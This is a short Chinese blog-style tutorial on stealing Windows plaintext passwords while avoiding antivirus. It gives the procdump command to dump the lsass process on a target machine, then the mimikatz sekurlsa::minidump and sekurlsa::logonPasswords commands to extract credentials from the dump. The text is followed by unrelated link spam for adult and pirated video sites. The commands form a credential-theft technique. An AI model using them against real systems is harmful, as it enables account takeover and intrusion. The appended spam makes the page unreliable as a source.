众所周知mimikatz可以直接抓到存放在lsass进程中的明文密码,但是很多情况下有杀软这种瘟神挡道,我们必须另想办法。
procdump是微软官方提供的一个小工具,在微软官方有下载
下载地址
将工具拷贝到目标机器上执行如下命令(需要管理员权限)
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
获得一个lsass进程的内存dump文件lsass.dmp,下面我就们就要用mimikatz(注意是alpha版的mimikatz,否则没有这个命令可用)获得dump文件的明文密码了。
但要注意dump文件和mimikatz的版本对应关系,对应关系如图:
将这个内存dump文件拷贝到mimikatz同目录下,双击打开mimikatz执行情况如图:
mimikatz # sekurlsa::minidump lsass.dmpSwitch to MINIDUMPmimikatz # sekurlsa::logonPasswords full
大功告成,菜鸟言论,仅供娱乐。
| 手机福利视频播放器推荐 | |||
| 豆奶视频 | 丝瓜视频 | avbobo | 包子视频 |
| 秋秋影视 | 香蕉视频 | 蜜瓜电影 | 茄子视频 |
| 磁力吧 | 怡春院 | 电影港 | 食色抖音 |
| 私密免费观看直播吧 | 逗别看 | 唇色直播 | 影豆网 |
| 苦瓜网 | 尘落电影网 | 4k屋 | 火豆电影网 |
读书宝小说阅读器 v1.28 官方版
龙图腾金牌网吧代理器 v8.5 官方最新版
华为U8860 Honor荣耀驱动 v1.0 官方版